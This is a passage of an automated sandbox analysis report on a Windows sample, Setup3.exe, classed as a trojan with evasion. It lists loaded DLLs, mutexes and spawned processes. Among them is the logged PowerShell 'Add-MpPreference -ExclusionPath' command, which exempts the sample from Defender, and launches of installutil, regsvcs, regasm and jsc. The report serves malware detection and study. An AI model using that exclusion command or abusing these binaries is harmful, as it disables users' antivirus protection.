                Source: Setup3.exe, 00000000.00000002.2235573603.000001AAE4E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHolyaya.exe0 vs Setup3.exe
                Source: Setup3.exe, 00000000.00000002.2233865969.000001AAD32D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIxajujamuyadutuyejH vs Setup3.exe
                Source: Setup3.exeBinary or memory string: OriginalFilenameHolyaya.exe0 vs Setup3.exe
                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@17/10@4/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_03
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2792
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgkjbbwc.z4g.ps1Jump to behavior
                Source: Setup3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Setup3.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                Source: C:\Users\user\Desktop\Setup3.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Setup3.exeReversingLabs: Detection: 52%
                Source: Setup3.exeVirustotal: Detection: 64%
                Source: C:\Users\user\Desktop\Setup3.exeFile read: C:\Users\user\Desktop\Setup3.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Setup3.exe "C:\Users\user\Desktop\Setup3.exe"
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2792 -s 1104
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -ForceJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Setup3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Setup3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Setup3.exeStatic file information: File size 1118952 > 1048576
                Source: Setup3.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: mscorlib.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.ni.pdbRSDS source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Windows.Forms.pdb0 source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Drawing.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: mscorlib.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Drawing.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Core.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1774.tmp.dmp.12.dr
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Drawing.pdbH source: WER1774.tmp.dmp.12.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Core.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F28248 push ebx; retn 5F4Dh0_2_00007FF848F2826A
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F28118 push ebx; ret 0_2_00007FF848F2816A
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F2AC2F pushad ; ret 0_2_00007FF848F2AEC9
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F2AECA pushad ; ret 0_2_00007FF848F2AEC9
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F276F3 push eax; retf 0_2_00007FF848F276F4
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F200BD pushad ; iretd 0_2_00007FF848F200C1
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF8490101B8 push esp; retf 4810h0_2_00007FF849010312

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
